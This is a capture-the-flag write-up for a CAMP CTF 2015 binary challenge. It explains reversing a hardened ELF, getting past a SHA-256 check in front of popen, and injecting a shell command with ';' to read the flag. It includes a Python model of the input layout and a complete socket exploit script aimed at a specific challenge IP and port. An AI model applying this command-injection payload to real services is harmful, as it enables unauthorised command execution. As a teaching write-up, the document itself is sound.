This challenge is from CAMP CTF 2015. It is the first real binary exploitation challenge I have solved. The given binary is an ELF 64-bit, dynamically linked and stripped. I started by feeding it a large random input and got a segmentation fault at some point, so I thought it must be a simple ROP and started reversing it. I found some vulnerable-looking functions: getline (which accepts a line of any length) and, right after it, a call to strcpy, which surprised me: why would you need strcpy when you already have the line from getline? To check whether NX was enabled, I ran checksec:
RELRO        STACK CANARY    NX           PIE           RPATH      RUNPATH
Full RELRO   Canary found    NX enabled   PIE enabled   No RPATH   No RUNPATH
Full RELRO and a stack canary came as a shock: with Full RELRO the GOT is read-only, so it cannot be overwritten, and the canary stops a plain stack overflow from reaching the return address, so ordinary ROP is out (at least without a leak). So I figured the intended bug must be something other than the overflow and started reversing again. I found a call to popen, which could spawn a shell. But to reach that call you have to pass a strcmp, and the comparison was against a hash value.
Later I figured out that the hash was SHA-256 and that it was computed over 256 bytes, but I did not know which 256 bytes. After some brute force I found that they were the first 256 bytes of the input, and that the hex digest was compared against the input starting from the 284th byte. I tried giving input that matched, and it worked: I could call popen with an argument starting from the 257th byte of the input. Then I tried giving "/bin/sh\x00" as the argument, but that didn't work because of a strrchr call at the beginning which I hadn't noticed; it was searching for the null byte. So that didn't work, and I wasted a lot of time trying other things. Later one of my seniors gave me an idea: command injection with ";". popen hands its argument to sh -c, and here the argument runs from the 257th byte to the end of the line (padding and hash included), so a ";" right after the command makes the shell run it and then treat the trailing bytes as a separate command that simply fails. I tried reading the flag that way and it worked. 🙂
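To make the layout concrete, here is an added example of my own (not the original exploit) that builds the line with hashlib and models the gate the way the writeup describes it. The 0-based offsets 256 (start of the popen argument) and 283 (start of the hex digest, the "284th byte") come from the writeup; that the binary compares a lowercase hex digest and reads the argument as a plain C string up to the first NUL is an assumption, stated in the comments. It goes slightly beyond the post by also showing what the shell receives with and without the ";".

```python
import hashlib

# Layout as the writeup describes it (offsets are 0-based here).
HASHED_LEN = 256         # the binary hashes the first 256 bytes of the line
CMD_OFFSET = 256         # the popen() argument starts at the 257th byte
DIGEST_OFFSET = 283      # the hex digest is compared from the 284th byte
DIGEST_HEXLEN = 64       # SHA-256 as lowercase hex (assumed, matches the writeup)


def digest_hex(data):
    """Lowercase SHA-256 hex digest, as the binary is assumed to compare it."""
    return hashlib.sha256(data).hexdigest().encode()


def build_payload(cmd, filler=b"A", pad=b"B"):
    """Return one input line: [256 hashed bytes][cmd][pad][hex digest]\\n."""
    if isinstance(cmd, str):
        cmd = cmd.encode()
    if b"\x00" in cmd:
        # A NUL ends the C string, so nothing after it reaches popen();
        # this is why "/bin/sh\x00" did not work in the writeup.
        raise ValueError("command must not contain NUL bytes")
    head = filler * HASHED_LEN
    gap = DIGEST_OFFSET - CMD_OFFSET - len(cmd)
    if gap < 0:
        raise ValueError("command too long: it would overwrite the digest field")
    return head + cmd + pad * gap + digest_hex(head) + b"\n"


def c_string(buf):
    """What strcpy()/popen() see: bytes up to the first NUL."""
    return buf.split(b"\x00", 1)[0]


def simulate_check(line):
    """Model (assumed, not the real binary) of the strcmp gate in front of popen().

    Returns the string popen() would receive, or None if the digest
    comparison fails.
    """
    line = line.rstrip(b"\n")
    expected = digest_hex(line[:HASHED_LEN])
    supplied = line[DIGEST_OFFSET:DIGEST_OFFSET + DIGEST_HEXLEN]
    if supplied != expected:
        return None
    return c_string(line[CMD_OFFSET:]).decode(errors="replace")


def shell_commands(popen_arg):
    """Split on ';' the way `sh -c` does: the first item is the injected command,
    anything after it is the padding plus digest that sh will fail to run."""
    return [part.strip() for part in popen_arg.split(";")]


if __name__ == "__main__":
    line = build_payload("/bin/cat flag.txt;")
    arg = simulate_check(line)
    print(len(line), arg)
    print(shell_commands(arg))
```

Without the ";", the same layout hands sh a single command `/bin/cat flag.txtBBBBBBBBBB<digest>`, which is why the trailing bytes have to be cut off with a separator rather than with a NUL.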
And here is my exploit.
import hashlib
import socket

ip = "144.76.92.167"
port = 10105

head = b"A" * 256                        # the 256 bytes the binary hashes
payload = head
payload += b"/bin/cat flag.txt;"         # popen() argument starts at offset 256; ';' ends the command
payload += b"B" * 9                      # pad so the digest lands at offset 283 (the 284th byte)
payload += hashlib.sha256(head).hexdigest().encode()  # e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb for 256 A's
payload += b"\n"                         # getline() reads up to the newline

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))
soc.sendall(payload)
print(soc.recv(1050).decode(errors="replace"))